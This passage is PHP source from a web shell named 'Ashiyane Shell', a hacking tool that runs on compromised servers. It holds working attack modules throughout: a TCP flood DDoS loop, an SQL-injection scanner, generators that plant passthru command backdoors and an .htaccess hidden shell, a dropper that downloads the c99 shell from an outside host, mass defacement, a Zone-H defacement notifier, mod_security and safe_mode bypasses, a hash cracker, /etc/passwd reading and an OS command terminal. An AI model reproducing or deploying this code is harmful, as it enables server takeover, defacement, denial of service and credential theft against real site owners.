intrusion</option> <option value="9" >FTP Server intrusion</option> <option value="10" >SSH Server intrusion</option> <option value="11" >Telnet Server intrusion</option> <option value="12" >RPC Server intrusion</option> <option value="13" >Shares misconfiguration</option> <option value="14" >Other Server intrusion</option> <option value="15" >SQL Injection</option> <option value="16" >URL Poisoning</option> <option value="17" >File Inclusion</option> <option value="18" >Other Web Application bug</option> <option value="19" >Remote administrative panel access through bruteforcing</option> <option value="20" >Remote administrative panel access through password guessing</option> <option value="21" >Remote administrative panel access through social engineering</option> <option value="22" >Attack against the administrator/user (password stealing/sniffing)</option> <option value="23" >Access credentials through Man In the Middle attack</option> <option value="24" >Remote service password guessing</option> <option value="25" >Remote service password bruteforce</option> <option value="26" >Rerouting after attacking the Firewall</option> <option value="27" >Rerouting after attacking the Router</option> <option value="28" >DNS attack through social engineering</option> <option value="29" >DNS attack through cache poisoning</option> <option value="30" >Not available</option> <option value="31" >Cross-Site Scripting</option> </select> <br /> <span>Select The Reason: </span><select name="reason"> <option value="">--------SELECT--------</option> <option value="1" >Heh...just for fun!</option> <option value="2" >Revenge against that website</option> <option value="3" >Political reasons</option> <option value="4" >As a challenge</option> <option value="5" >I just want to be the best defacer</option> <option value="6" >Patriotism</option> <option value="7" >Not available</option> </select><br /> <textarea name="domains" cols="90" rows="20" placeholder="Domains..."></textarea> <br /> <input type="submit" value="send" /> </form> <?php if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="send") { $defacer= $_REQUEST['defacer']; $hackmode= $_REQUEST['hackmode']; $reason= $_REQUEST['reason']; $domains= $_REQUEST['domains']; $domains_list=explode("\n",$domains); if (empty($defacer)) { die ("<center><b><font color =\"#FF0000\">[+] You Must Fill The Notifier Name [+]</font></b></center>"); } elseif($hackmode == "") { die("<center><b><font color =\"#FF0000\">[+] You Must Select The Method [+]</b></font></center>"); } elseif($reason == "") { die("<center><b><font color =\"#FF0000\">[+] You Must Select The Reason [+]</b></font></center>"); } elseif(empty($domains)) { die("<center><b><font color =\"#FF0000\">[+] You Must Enter The Sites List [+]<font></b></center>"); } for($i=0;$i<count($domains_list);$i++) { if(substr($domains_list[$i], 0, 4) != "http") { $domains_list[$i] = "http://".$domains_list[$i]; } $postVars=array("defacer"=>$defacer,"hackmode"=>$hackmode,"reason"=>$reason,"domain1"=>$domains_list[$i]); $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,'http://www.zone-h.com/notify/single'); curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($curl,CURLOPT_TIMEOUT, 120); curl_setopt($curl,CURLOPT_POST,TRUE); curl_setopt($curl,CURLOPT_POSTFIELDS, $postVars); $a = curl_exec($curl); curl_close($curl); } echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>"; } ?> </div> <?php } if($action=="ddoser"){ ?> <br /> <div class="ddos"> <form action="?action=ddoser&submit=ddos&dir=<?php echo $path ?>" method="post"> <input type="text" name="ip" value="ip_adress:port" /> <input type="submit" name="ddos"/> </form> <?php set_time_limit(0); ignore_user_abort(FALSE); if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="ddos") { if(isset($_REQUEST['ip']) && $_REQUEST['ip'] != "ip_adress:port" && $_REQUEST['ip'] != ""){ $ip=explode(":",$_POST['ip']); for($i=0;$i<65535;$i++){ $out .= "X"; } while(1){ $fp = fsockopen($ip[0], $ip[1], $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } } else{ echo "<font color=\"#FF0000\">Please Enter Ip!</font>"; } } ?> </div> <?php } if($action=="sqli"){ ?> <br /> <div class="sqli"> <span>Sites:</span><br /> <form action="?action=sqli&submit=check&dir=<?php echo $path ?>" method="post"> <textarea name="link" cols=40 rows=10></textarea> <input type="submit" value="check" name="submit"/> </form> <?php if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="check") { if(isset($_REQUEST['link']) && $_REQUEST['link'] != ""){ echo 'List Sites Have SQLi Vulnerability: <br>'; $link= $_REQUEST['link']; $link_list=explode("\n",$link); for($i=0;$i<count($link_list);$i++) { if(substr($link_list[$i], 0, 4) != "http") { $link_list[$i] = "http://".$link_list[$i]; } $a=file_get_contents($link_list[$i].'\"'); if(preg_match("/You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near/i",$a)) { echo $link_list[$i]."</br>"; } } } else{ echo "<font color=\"#FF0000\">Please Enter Sites !</font>"; } } ?> </div> <?php } if($action=="backdoor"){ ?> <br /> <div class="body"> <?php $list = '<ul>'; if ( !isset($_GET["bd"]) || $_GET["bd"]!=="up" ) { $list .= "<a href=\"?action=backdoor&bd=up&dir=$path\"><li>Upload From Computer Backdoors</li></a>"; } else { $list .= '<li><span>Upload From Computer Backdoors</span></li>'; } if( !isset($_GET["bd"]) || $_GET["bd"]!=="ur" ) { $list .= "<a href=\"?action=backdoor&bd=ur&dir=$path\"><li>Upload From URL Backdoors</li></a>"; } else { $list .= '<li><span>Upload From URL Backdoors</span></li>'; } if( !isset($_GET["bd"]) || $_GET["bd"]!=="ht" ) { $list .= "<a href=\"?action=backdoor&bd=ht&dir=$path\"><li>htaccess Hidden Shell Backdoor</li></a>"; } else { $list .= '<li><span>htaccess Hidden Shell Backdoor</span></li>'; } if ( !isset($_GET["bd"]) || $_GET["bd"]!=="cs" ) { $list .= "<a href=\"?action=backdoor&bd=cs&dir=$path\"><li>CMD shell Backdoor</li></a>"; } else { $list .= '<li><span>CMD shell Backdoor</span></li>'; } echo $list.'</ul>'; ?> <hr /> <br /> <?php if(isset($_GET["bd"])){ $bd = $_GET["bd"]; if($bd=="up"){ echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=up&dir=$path\"><span>Enter Filename create backdoor: </span><br /><input type=\"text\" name=\"filename\"><br><br /><input type=\"submit\" value=\"Get Backdoor\"></form>"; ?> <br /> <b><span>Note: This Just Make an uploader not hidden.</span></b> <?php } if($bd=="ur"){ echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=ur&dir=$path\"><span>Enter Filename to add backdoor: </span><br /><input type=\"text\" name=\"filename\"><br><br /><input type=\"submit\" value=\"Get Backdoor\"></form>"; ?> <br /> <b><span>How to use ?</span></b> <p>to use : "site.com/[path]/[file].php?cmd=shell"</p> <?php } if($bd=="cs"){ echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=cs&dir=$path\"><span>Enter Filename to add backdoor: </span><br /><input type=\"text\" name=\"filename\"><br><br /><input type=\"submit\" value=\"Get Backdoor\"></form>"; ?> <br /> <b><span>How to use ?</span></b> <p>to use : "site.com/[path]/[file].php?cmd=[command]"</p> <?php } if($bd=="ht"){ echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=ht&dir=$path\"><br /><input type=\"submit\" value=\"Get htaccess Backdoor\"></form>"; ?> <br /> <b><span>How to use ?</span></b> <p>to use : "site.com/[path]/.htaccess?cmd=[command]"</p> <?php } } if(isset($_GET["action"]) && $_GET["action"]=="backdoor" && isset($_GET["submit"])=="get" && isset($_GET["go"]) && $_GET["go"]!=""){ $action=$_GET["go"]; if($action=="up"){ $code='<?php if (isset($_FILES["userfile"])) { $dir=$_POST["dir"]; if($dir == "" || !isset($dir)) $dir=getcwd(); $uploadfile=$dir."/".basename($_FILES["userfile"]["name"]); if (move_uploaded_file($_FILES["userfile"]["tmp_name"],$uploadfile)) { echo "Uploaded: ". "Name: ".$_FILES["userfile"]["name"]."<br>\n". "Type: ".$_FILES["userfile"]["type"]."<br>\n". "Size: ".$_FILES["userfile"]["size"]." bytes<br>\n"; } else print "Error uploading file: ".$_FILES["userfile"]["name"].""; echo "<hr>"; } ?> <form enctype="multipart/form-data" method="POST"> Upload New File <br /><input type="file" name="userfile"/> <br /><input type="submit" value="Upload"/> </form>'; $filename = htmlspecialchars($_POST["filename"]); $fp=fopen($filename,'a'); $res = fwrite($fp , $code); fclose($fp); if($res){ echo "<span style='color:green'>ok</span>"; }else{ echo "<span style='color:red'>cant be write</span>"; } } if($action=="ur"){ $code = '<?php //Code By Mahdi.Hidden ~ Ashiyane Digital Security Team if(isset($_GET["cmd"]) && $_GET["cmd"]=="shell"){ if(file_put_contents("shell.php", file_get_contents("http://www.sh3ll.org/c99.txt"))){ echo "OK"; } else { echo "File Cant Be Create"; } } //Code By Mahdi.Hidden ~ Ashiyane Digital Security Team ?>'; $filename = htmlspecialchars($_POST["filename"]); $fp=fopen($filename,'a'); $res = fwrite($fp , $code); fclose($fp); if($res){ echo "<span style='color:green'>ok</span>"; }else{ echo "<span style='color:red'>cant be write</span>"; } } if($action=="ht"){ $code = '<Files ~ "^\.ht"> Order allow,deny Allow from all </Files> AddType application/x-httpd-php .htaccess # <?php passthru($_GET["cmd"]); ?>'; $filename = ".htaccess"; $fp=fopen($filename,'a'); $res = fwrite($fp , $code); fclose($fp); if($res){ echo "<span style='color:green'>ok</span>"; }else{ echo "<span style='color:red'>cant be write</span>"; } } if($action=="cs"){ $code = '<?php passthru($_GET["cmd"]); ?>'; $filename = htmlspecialchars($_POST["filename"]); $fp=fopen($filename,'a'); $res = fwrite($fp , $code); fclose($fp); if($res){ echo "<span style='color:green'>ok</span>"; }else{ echo "<span style='color:red'>cant be write</span>"; } } } ?> </div> <?php } if($action=="mass"){ ?> <br /> Mass Defacement:</td><br> <form action='?action=mass&submit=mass&dir=<?php echo $path ?>' method='post'> [+] Directory: <input type='text' style='width: 700px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'> <br/>[+] Url Deface Deface Page <input type='text' style='width: 675px' name='massdefaceurl' value=''> <br/>[+] Name File <input type='text' style='width: 735px' name='filename' value='mahdi.hidden.html'> <input type='submit' name='execmassdeface' value='Kill It'></form></td> <?php if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="mass"){ echo "<br><span style='margin-left:0px'>Results: </span><br><center><textarea placeholder='Results will be here..' rows='15' cols='100'>"; $defaceurl = $_POST['massdefaceurl']; $dir = $_POST['massdefacedir']; $filename = $_POST['filename']; echo $dir."\n"; if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if(filetype($dir.$file)=="dir"){ $newfile=$dir.$file."/".$filename; echo $newfile."\n"; if (!copy($defaceurl, $newfile)) { echo "failed to copy $file...\n"; } } } closedir($dh); } } echo "</textarea></center>"; } ?> <?php } if($action=="disfunc"){ ?> <br /> <center> <table> <tr><td> <form action="?action=disfunc&submit=bypass&bypass=apache&dir=<?php echo $path ?>" method="post"> <input type="submit" value="htaccess apache" /> </form> </td><td> <form action="?action=disfunc&submit=bypass&bypass=litespeed&dir=<?php echo $path ?>" method="post"> <input type="submit" value="htaccess litespeed" /> </form> </td><td> <form action="?action=disfunc&submit=bypass&bypass=phpini&dir=<?php echo $path ?>" method="post"> <input type="submit" value="php.ini" /> </form> </td></tr> </table> </center> <?php if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="bypass"){ $bypass = $_REQUEST['bypass']; if($bypass=="apache"){ ?> <?php $fil=fopen($path."/".".htaccess","w"); fwrite($fil,'#Generated By SHA13AH <IfModule mod_security.c> Sec------Engine Off Sec------ScanPOST Off </IfModule>'); fclose($fil); echo '<script>alert("htaccess for Apache is created...!")</script>'; ?> <?php } elseif($bypass=="phpini"){ ?> <?php $fil=fopen($path."/"."php.ini","w"); fwrite($fil,'safe_mode=OFF disable_functions=ByPass By SHA13AH'); fclose($fil); $file2=fopen($path."/"."ini.php","w"); fwrite($file2,'<? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?>'); fclose($file2); echo '<script>alert("php.ini && ini.php is created...!")</script>'; ?> }<?php } elseif($bypass=="litespeed"){ ?> <?php $fil=fopen($path."/".".htaccess","w"); fwrite($fil,'#Generated By SHA13AH <Files *.php> ForceType application/x-httpd-php4 </Files> ahm tas: <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>'); fclose($fil); echo '<script>alert("htaccess for Litespeed is created...!")</script>'; ?> <?php } } ?> <?php } if($action=="info"){ ?> <br /> <?php echo '<div class=phpinfo><style>.p {color:#000;}</style>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2, hr) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('<h1','<h2', $tmp) .'</div><br>'; ?> <?php } if($action=="aboutus"){ ?> <br /> <img src="http://ashiyane.org/aboutus/images/logo2.png" /><br /> <span style="color:#F00;font-size:20px">ASHIYANE SHELL V 2.5.5</span><br /> <span style="font-size:19px">Shell Coded By <a target="_blank" href="http://ashiyane.org/forums/member.php?1281761">Mahdi.Hidden</a></span><br /> <span>Special Thanks To: Virangar, C4T, Mast3r 0mid, Black-Hole, Milad Hacking, eb051, SaiedSoft, Predator, Hossein)root, Alireza Attacker, Reza, Pr0grammer, Mr.reCoder, SolD!3r, h0j@T, Nc 521, Spoofer, HAMIDx9 AND My Friends & All Ashiyane Members</span><br /> <span>WebSite: <a href="http://ashiyane.org" target="_blank">Ashiyane.org</a><br /> <span>Ashiyane Digital Security Team</span><br /> <?php } if($action=="rmshell"){ ?> <form action="?action=rmshell" method="post"> <span>Do You Really Want To Remove Shell?</span><br /> <input type="submit" value="Yes" name="accept" /> </form> <?php if(isset($_POST['accept']) && $_POST['accept'] != "" && $_POST['accept']=="Yes"){ if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('<b>Shell has been removed</i> :)</b>'); else echo 'unlink error!'; } } //hash cracker ~ By Black-Hole if($action=="hashcracker"){ error_reporting(0); echo '<br>'; if(isset($_POST['hashs'])) $hashs = $_POST['hashs']; if(isset($_POST['algo'])) $algo = $_POST['algo']; if(isset($_POST['email'])) $email = $_POST['email']; if(isset($_POST['passlist'])) $passlist = $_POST['passlist']; if(isset($_POST['atype'])) $atype = $_POST['atype']; if(isset($_POST['chars'])) $chars = $_POST['chars']; if(isset($_POST['maxhash'])) $maxhash = $_POST['maxhash']; ?> <CENTER> <div class="hashcracker"> <form action="" method="post"> <table> <font color="white"><Input type = 'Radio' Name ='atype' value= 'dic' >Dictionary Attack </font> <font color="white"><Input type = 'Radio' Name ='atype' value= 'bru' >Brute-Force Attack</font><br> <tr><td><font color="white"> Hash : </font></td><td><input type="text" name="hashs" value="" /></td></tr> <tr><td><font color="white"><a href="http://php.net/manual/en/ref.hash.php"> Algorithm : <a/></font></td><td><input type="text" name="algo" value="" /></td></tr> <tr><td><font color="white"><a href="http://ashiyane.org/forums/showthread.php?t=72306">Word List .txt :</a></font></td><td><input type="text" name="passlist" value="" /></td></tr> <tr><td><font color="white">Characters: </font></td><td><input type="text" name="chars" value="" /></td></tr> <tr><td><font color="white"><input type="checkbox" name="charrr[]" value="l" />Lower Case: abcd...   </td> <td><input type="checkbox" name="charrr[]" value="u" />Upper Case: ABCD...   </td> <td><input type="checkbox" name="charrr[]" value="n" />Numbers: 1234567890   </td> <td><input type="checkbox" name="charrr[]" value="s" />Symbols: ~`!@#$%^&*()-_/'";:,.+=<>?    </td> </font> <tr><td><font color="white">Max lenght: <input type="text" name="maxhash" value="" /></font></td></tr> <tr><td><font color="white">E-Mail : </font><input type="text" name="email" value="" /></td></tr> <tr><td><input type="submit" value="Crack !"/></td></tr> </form> <tr><td><font color="white"><a href="http://ashiyane.org/forums/showthread.php?p=329241">Need help? Use Ashiyane Hash Analyzer</a></font></td></tr> </div> <font color="white"> <?php if(isset($atype)) if($atype=="dic") { $words = file($passlist); $solve = ""; foreach($words as $word) if(hash($algo,(trim($word))) == $hashs) { $solve = $word; break; } echo "Password Found:".$solve; mail ($email,"Result of HASH CRACKING !","\r\nCrack :".$solve."Powerd by Ashiyane Sheller \r\n Ashiyane Digital Securit Team"); } else { function IsChecked($chkname,$value) { if(!empty($_POST[$chkname])) foreach($_POST[$chkname] as $chkval) if($chkval == $value) return true; return false; } $maxhash = $_POST['maxhash']; $chars = $_POST['chars']; define('HASH', $hashs); define('HASH_ALGO',$algo); // max length of password to try define('PASSWORD_MAX_LENGTH', $maxhash); $charset = $chars; if(IsChecked('charrr','l')) $charset = 'abcdefghijklmnopqrstuvwxyz'; if(IsChecked('charrr','n')) $charset .= '0123456789'; if(IsChecked('charrr','u')) $charset .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; if(IsChecked('charrr','s')) $charset .= '~`!@#$%^&*()-_\/\'";:,.+=<>? '; $charset_length = strlen($charset); function check($password) { if (hash(HASH_ALGO, $password) == HASH) { echo ' Password : '.$password."\r\n"; mail ($email,"Result of HASH CRACKING !","\nCrack :".$password."\n Cod3d by Black-Hole \n Contact me : Gigelaknak@yahoo.com \n Ashiyane Digital Securit Team"); exit; } } function recurse($width, $position, $base_string) { global $charset, $charset_length; for ($i = 0; $i < $charset_length; ++$i) { if ($position < $width - 1) { recurse($width, $position + 1, $base_string . $charset[$i]); } check($base_string . $charset[$i]); } } recurse(PASSWORD_MAX_LENGTH, 0, ''); if(isset($hashs)) echo "Password not found ...\r\n"; } ?> </font></CENTER> <?php } //end-hash cracker //sql connector ~ by Mast3r 0mid if($action=="sql"){ $pwd = realpath(".")."\\"; if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])) { $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)) { $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport; $msg .= " <span class=\"gaya\">-></span> <a href=\"?action=sql&y=".$pwd."&x=mysql& sqlhost=".$sqlhost."&sqluser=".$sqluser."& sqlpass=".$sqlpass."& sqlport=".$sqlport."&\">[ databases ]</a>"; if(isset($_GET['db'])) $msg .= " <span class=\"gaya\">-></span> <a href=\"?action=sql&y=".$pwd."&x=mysql& sqlhost=".$sqlhost."&sqluser=".$sqluser."& sqlpass=".$sqlpass."& sqlport=".$sqlport."& db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>"; if(isset($_GET['table'])) $msg .= " <span class=\"gaya\">-> </span> <a href=\"?action=sql&y=".$pwd."&x=mysql& sqlhost=".$sqlhost."&sqluser=".$sqluser."& sqlpass=".$sqlpass."&sqlport=".$sqlport."& db=".$_GET['db']."& table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))) { $db = $_GET['db']; $query = "DROP TABLE IF EXISTS Newbie3viLc063s0_table; \nCREATE TABLE `Ashiyane Digital Security Team` ( `file` LONGBLOB NOT NULL ); \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Mast3r_table;SELECT * FROM Ashiyane_table; \nDROP TABLE IF EXISTS Ashiyane_table;"; $msg = "<div style=\"width:99%;padding:0 10px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"action\" value=\"sql\" /> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p> </form> </div> "; $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)) { @array_push($tables,$table); } @sort($tables); foreach($tables as $table) { $msg .= "<tr><td><a href=\"?action=sql&y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))) { $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"action\" value=\"sql\" /> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p> </form> </div> "; $columns = array(); $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)) { $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)) { $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"action\" value=\"sql\" /> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">"; for($i = 1;$i <= $totpage;$i++) { $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")) { $db = $_GET['db']; $query = $_GET['sqlquery']; $msg = "<div style=\"width:99%;padding:0 10px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"action\" value=\"sql\" /> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p> </form> </div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query) { if(trim($query) != "") { $hasil = mysql_query($query); if($hasil) { $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\n SHOW VARIABLES;\n SHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"action\" value=\"sql\" /> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p> </form> </div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db) { $msg .= "<tr><td><a href=\"?action=sql&y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else { ?> <form action="?" method="get"> <input type="hidden" name="action" value="sql" /> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr> <th colspan="2">Connect to mySQL server</th> </tr> <tr> <td> Host</td> <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td> </tr> <tr> <td> Username</td> <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td> </tr> <tr> <td> Password</td> <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td> </tr> <tr> <td> Port</td> <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td> </tr> </table> </form> <?php } //end sql connector } //terminal ~ by Mast3r 0mid if($action=="terminal"){ $user = @get_current_user(); $prompt = $user." >"; $pwd = realpath(".")."\\"; function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } ?> <CENTER> <form action="?action=terminal&CMD=shell#down" method="post"> <table class="cmdbox"> <tr> <td colspan="2"> <a name="down"></a> <textarea style="width: 1000px; height: 400px;color: #2677B4;background-color: #000;border: 1px solid #2677B4;font: 9pt Monospace,"Courier New";" class="output" readonly=""> $<?php if(isset($_POST['submitcmd'])) { echo $_POST['cmd']."\n";}?><?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> </td> </tr> <tr> <td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="input" type="text" name="cmd" style="width:60%;" value="" /> <input class="inputbutn" type="submit" value="Execute !" name="submitcmd" style="width:12%;" /> </td> </tr> </table> </form></CENTER> <?php //end terminal } if($action=="basedir"){ echo '<div style="text-align:left">'; ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>'); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>'); } $pub = array(); $users = array(); $conf = array(); 